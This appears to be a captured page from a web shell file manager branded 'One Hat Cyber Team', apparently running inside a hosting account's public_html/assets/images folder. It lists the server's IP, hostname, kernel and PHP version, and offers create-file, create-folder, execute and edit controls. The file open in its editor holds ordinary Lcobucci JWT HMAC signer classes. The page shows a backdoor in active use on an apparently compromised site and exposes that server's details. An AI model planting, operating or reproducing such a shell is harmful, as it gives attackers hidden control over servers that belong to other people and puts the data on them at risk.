One Hat Cyber Team
Your IP:
216.73.216.102
Server IP:
198.54.114.155
Server:
Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
Server Software:
LiteSpeed
PHP Version:
5.6.40
Create File
|
Create Folder
Execute
Dir :
~
/
home
/
fluxyjvi
/
public_html
/
assets
/
images
/
Edit File:
Hmac.tar
Sha384.php 0000644 00000000444 15107365504 0006237 0 ustar 00 <?php declare(strict_types=1); namespace Lcobucci\JWT\Signer\Hmac; use Lcobucci\JWT\Signer\Hmac; final class Sha384 extends Hmac { public function algorithmId(): string { return 'HS384'; } public function algorithm(): string { return 'sha384'; } } Sha256.php 0000644 00000000444 15107365504 0006235 0 ustar 00 <?php declare(strict_types=1); namespace Lcobucci\JWT\Signer\Hmac; use Lcobucci\JWT\Signer\Hmac; final class Sha256 extends Hmac { public function algorithmId(): string { return 'HS256'; } public function algorithm(): string { return 'sha256'; } } Sha512.php 0000644 00000000444 15107365505 0006231 0 ustar 00 <?php declare(strict_types=1); namespace Lcobucci\JWT\Signer\Hmac; use Lcobucci\JWT\Signer\Hmac; final class Sha512 extends Hmac { public function algorithmId(): string { return 'HS512'; } public function algorithm(): string { return 'sha512'; } }
Simpan